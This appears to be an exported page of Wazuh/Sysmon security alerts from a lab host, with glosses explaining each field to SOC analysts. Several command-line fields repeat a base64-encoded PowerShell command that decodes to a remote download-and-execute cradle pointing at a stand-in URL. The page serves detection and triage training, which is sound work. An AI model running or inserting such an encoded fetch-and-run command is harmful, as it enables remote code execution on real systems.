data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:30.992+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:30.992+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  113
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534430.2078886
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:28.7262487Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285988
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:28.699 ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ProcessId: 11028 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1 CreationUtcTime: 2025-04-24 22:40:28.699 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:28.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:28.699
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:33.850+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:33.850+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  110
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534433.2081655
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:31.1947018Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286008
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:29.920 ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ProcessId: 16696 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} ParentProcessId: 11028 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:29.920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdda-680a-d30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line of the parent. -NoLogo -NoProfile -EncodedCommand is a non-interactive PowerShell carrying a base64-encoded script; the argument is base64 over UTF-16LE text and must be decoded before the alert can be judged.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent process runs as. When it differs from data.win.eventdata.user, a token change happened between parent and child (runas, service, exploit).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:33.853+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Before treating this as a tool transfer, read targetFilename: __PSScriptPolicyTest_*.ps1 in the user's Temp is the short-lived script Windows PowerShell writes at every start-up to test whether AppLocker/WDAC script enforcement applies, not a downloaded file. The question is who launched that PowerShell (processGuid {94294ddc-bddd-680a-d50b-000000000e00}, PID 16696); pivot to its EID 1 and parent chain rather than to the file.

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:33.853+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  114
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534433.2089726
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider; fixed per provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon). Useful for filtering when names are ambiguous.

data.win.system.eventID:  11
Event ID within the provider. For Sysmon, 11 = FileCreate: the process in Image created or overwrote the file in TargetFilename. Security-log IDs such as 4624 or 4688 do not apply to Sysmon events.

data.win.system.version:  2
Version of the event template. It changes when a field is added; only relevant if a decoder breaks.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon writes everything at 4, so the level carries no signal here.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID, so 11 adds nothing here; in the Security log it is the audit category (for example 12544 = Logon).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:31.3710438Z
Time the record was written to the Windows event log (UTC, 100 ns resolution). Sysmon's own utcTime is the moment of the action; the ~10 ms gap to it is normal, and the ~2.5 s gap to the Wazuh timestamp is collection delay.

data.win.system.eventRecordID:  286009
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record to ETW. For Sysmon events that is the Sysmon service itself (3712 on every Sysmon alert here), not the process under investigation; the latter is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process. Not investigative.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Export Microsoft-Windows-Sysmon/Operational (wevtutil epl) if you need the raw .evtx from this host.

data.win.system.computer:  Attacker
Host name Windows wrote into the record. It should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:31.361 ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ProcessId: 16696 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4ssfrd1y.lll.ps1 CreationUtcTime: 2025-04-24 22:40:31.361 User: Attacker\Attcker1"
Full Sysmon File created text. The eventdata fields below are parsed from it; read it when a parsed value looks truncated.

data.win.eventdata.utcTime:  2025-04-24 22:40:31.361
Moment Sysmon observed the file creation (UTC). Use it, not the manager timestamp, for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
Sysmon GUID of the process that created the file. Join it to an EID 1 ProcessGuid to get that process's command line and parent. This GUID (PID 16696) is the parentProcessGuid of the PowerShell in the EID 1 alert later on this page.

data.win.eventdata.processId:  16696
PID of the creating process at that moment. Recycled after exit; use processGuid for joins.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Windows PowerShell writing into its own user's Temp folder is expected start-up behaviour; the rule fired on the target path and extension, not on this image, so verify the writer yourself.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4ssfrd1y.lll.ps1
Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in the user's Temp is the short-lived test script Windows PowerShell writes at start-up to check whether AppLocker or WDAC script enforcement applies to it. It is PowerShell's own artefact, not a payload dropped by malware, and it appears once per PowerShell launch (compare the second alert of this kind on this page, from PID 2532). What matters is why PowerShell was started; pivot to the EID 1 for this processGuid.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:31.361
Creation timestamp of the file on disk. Equal to utcTime here, so the file was new; an earlier value means an existing file was overwritten or its timestamp carried over.

data.win.eventdata.user:  Attacker\\Attcker1
Account of the process that created the file.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:35.409+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts. This 4624 is logon type 5 with SYSTEM as both subject and new logon, requested by services.exe: the Service Control Manager starting a service under LocalSystem. It is logged many times per boot and is not evidence of Valid Accounts abuse on its own; pivot only if it coincides with a service install (7045/4697) or the account is not a built-in one.

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:35.409+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
GPG 13 (UK Good Practice Guide 13, protective monitoring) control mapping.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534435.2092495
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
Microsoft-Windows-Security-Auditing is the Security log provider; the fields follow the Windows audit schema and the ID is a classic Security event ID.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Provider GUID; fixed ({54849625-5478-4994-a5ba-3e3b0328c30d} is Security-Auditing).

data.win.system.eventID:  4624
Classic Security event ID. 4624 = an account was successfully logged on; pair it with 4634/4647 for the logoff and 4672 if special privileges were assigned.

data.win.system.version:  3
Template version of 4624. Newer versions add the Restricted Admin Mode, Virtual Account, Elevated Token and Remote Credential Guard fields visible in the message.

data.win.system.level:  0
ETW level 0 = Log Always. Security audit events all use it; success or failure is expressed in keywords instead.

data.win.system.task:  12544
Audit category of the event. 12544 = Logon.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Audit result flags. 0x8020000000000000 = Audit Success; 0x8010000000000000 would be Audit Failure (what 4625 carries).

data.win.system.systemTime:  2025-04-24T22:40:32.6880136Z
Time the record was written to the Security log (UTC). About 2.7 s before the Wazuh timestamp; collection delay, nothing more.

data.win.system.eventRecordID:  43881
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the record. For the Security log that is lsass.exe, not the logon's requester; the requester is data.win.eventdata.processId (0x304 = 772, services.exe).

data.win.system.threadID:  888
Thread inside lsass.exe that wrote the record. Not investigative.

data.win.system.channel:  Security
Channel holding the record: the Security log. Export it with wevtutil if you need the raw record.

data.win.system.computer:  Attacker
Host name Windows wrote into the record. It should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity. Security-log records use AUDIT_SUCCESS / AUDIT_FAILURE rather than INFO / WARNING / ERROR.

